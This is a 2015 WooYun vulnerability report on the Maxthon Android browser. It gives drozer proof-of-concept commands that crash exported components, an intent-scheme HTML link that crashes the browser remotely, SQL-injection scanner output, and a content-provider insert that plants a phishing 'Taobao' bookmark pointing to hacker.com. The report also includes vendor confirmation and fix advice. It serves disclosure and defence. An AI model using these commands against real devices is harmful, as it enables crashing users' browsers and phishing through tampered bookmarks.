当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120242

漏洞标题:傲游浏览器Android客户端多个漏洞(信息泄露/远程拒绝服务/SQL注入)

相关厂商:傲游

漏洞作者: 路人甲

提交时间:2015-06-16 15:02

修复时间:2015-09-14 18:28

公开时间:2015-09-14 18:28

漏洞类型:拒绝服务

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-16: 细节已通知厂商并且等待厂商处理中
2015-06-16: 厂商已经确认,细节仅向厂商公开
2015-06-19: 细节向第三方安全合作伙伴开放
2015-08-10: 细节向核心白帽子及相关领域专家公开
2015-08-20: 细节向普通白帽子公开
2015-08-30: 细节向实习白帽子公开
2015-09-14: 细节向公众公开

简要描述:

再来

详细说明:

#### 客户端版本,官网下载的最新版Maxthon_4.4.6.2000_remote_ChinaMainland.apk
#### 组件拒绝服务
客户端以下组件暴露,直接发送intent会导致浏览器崩溃退出

com.mx.browser.navigation.reader.RssNewsReaderActivity
com.chukong.cocosplay.GameActivity
com.chukong.cocosplay.GameLandscapeActivity
com.chukong.cocosplay.LoadActivity
com.chukong.cocosplay.LoadFragmentActivity
com.chukong.cocosplay.CocosProxyActivity
com.chukong.cocosplay.CocosProxyFragmentActivity
com.chukong.cocosplay.CocosProxyActivityGroup
com.maxthon.mge.MgePaymentActivity
com.mx.browser.account.AccountReceiver
com.mx.browser.cloud.MxReceiver


1.JPG


部分Logcat日志:

2.JPG


3.JPG


4.JPG


POC:

dz> run app.activity.start --component com.mx.browser com.mx.browser.navigation.reader.RssNewsReaderActivity
dz> run app.activity.start --component com.mx.browser com.chukong.cocosplay.GameActivity
dz> run app.activity.start --component com.mx.browser com.chukong.cocosplay.GameLandscapeActivity
dz> run app.activity.start --component com.mx.browser com.chukong.cocosplay.LoadActivity
dz> run app.activity.start --component com.mx.browser com.chukong.cocosplay.LoadFragmentActivity
dz> run app.activity.start --component com.mx.browser com.chukong.cocosplay.CocosProxyActivity
dz> run app.activity.start --component com.mx.browser com.chukong.cocosplay.CocosProxyFragmentActivity
dz> run app.activity.start --component com.mx.browser com.chukong.cocosplay.CocosProxyActivityGroup
dz> run app.activity.start --component com.mx.browser com.maxthon.mge.MgePaymentActivity
dz> run app.broadcast.send --component com.mx.browser com.mx.browser.account.AccountReceiver
dz> run app.broadcast.send --component com.mx.browser com.mx.browser.cloud.MxReceiver


MX浏览器支持IntentScheme,可以实现远程拒绝服务,用户点击含有恶意代码的页面,就会导致浏览器Crash,POC如下

用一个组件示例,其他类似
<h1><a href="intent:#Intent;component=com.mx.browser/com.chukong.cocosplay.LoadActivity;end">com.chukong.cocosplay.LoadActivity</a><br>


#### 信息泄露&SQL注入
数据接口暴露,其他任何APP都可以调用,导致信息泄露

dz> run app.provider.info -a com.mx.browser
Package: com.mx.browser
  Authority: com.mx.browser.browserprovider
    Read Permission: null
    Write Permission: null
    Content Provider: com.mx.browser.BrowserProvider
    Multiprocess Allowed: False
    Grant Uri Permissions: False
  Authority: com.mx.browser.commonprovider
    Read Permission: null
    Write Permission: null
    Content Provider: com.mx.browser.CommonProvider
    Multiprocess Allowed: False
    Grant Uri Permissions: False


检测存在SQL注入漏洞

dz> run scanner.provider.injection -a com.mx.browser
Scanning com.mx.browser...
Not Vulnerable:
  content://mx.history/
  content://com.tencent.mm.sdk.plugin.provider/sharedpref/
  content://icc/adn
  content://com.mx.browser.downloadprovider/download/
  content://com.mx.browser.downloadprovider/resetdb/
  content://com.facebook.katana.provider.AttributionIdProvider/
  content://com.android.launcher2.settings/favorites?notify=true/
  content://com.mx.browser.commonprovider/
  content://com.android.launcher2.settings/favorites?notify=true
  content://icc/adn/
  content://suggestion.searchengine
  content://com.mx.browser.downloadprovider/download
  content://com.android.launcher.settings/favorites?notify=true/
  content://com.mx.browser.downloadprovider/
  content://com.mx.browser.downloadprovider/resetdb
  content://com.mx.browser.downloadprovider
  content://com.mx.browser.commonprovider
  content://com.facebook.katana.provider.AttributionIdProvider
  content://com.android.launcher.settings/favorites?notify=true
  content://suggestion.searchengine/
  content://com.tencent.mm.sdk.plugin.provider/sharedpref
  content://mx.history
Injection in Projection:
  content://com.mx.browser.browserprovider/
  content://com.mx.browser.browserprovider
  content://com.mx.browser.browserprovider/bookmark
  content://com.mx.browser.browserprovider/bookmark/
Injection in Selection:
  content://com.mx.browser.browserprovider
  content://com.mx.browser.browserprovider/bookmark
  content://com.mx.browser.commonprovider/reader/
  content://com.mx.browser.commonprovider/reader_item/
  content://com.mx.browser.commonprovider/reader_item
  content://com.mx.browser.browserprovider/bookmark/
  content://com.mx.browser.browserprovider/
  content://com.mx.browser.commonprovider/reader


#### 通过暴露的数据接口,能够篡改用户收藏夹,可用于欺诈钓鱼攻击
POC:

dz> run app.provider.insert content://com.mx.browser.browserprovider/bookmark/ -
-integer _id 6 --string title Taobao --string url http://www.hacker.com/ --integ
er parent 0


执行前:

5.JPG


执行后:

6.JPG


可以看到,插入了一条新的收藏网址,名字是“Taobao”,而对应的网址却是“http://www.hacker.com/”,用户一旦不注意就会中招,造成钱财损失。

漏洞证明:

见详细说明

修复方案:

1. 组件正确处理异常intent
2. 敏感的ContentProvider数据接口不要对外暴露,或设置signature级别的权限
3. SQL注入问题,过滤、参数化操作等

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2015-06-16 18:26

厂商回复:

多谢作者,我们尽快修复这个问题。

最新状态:

暂无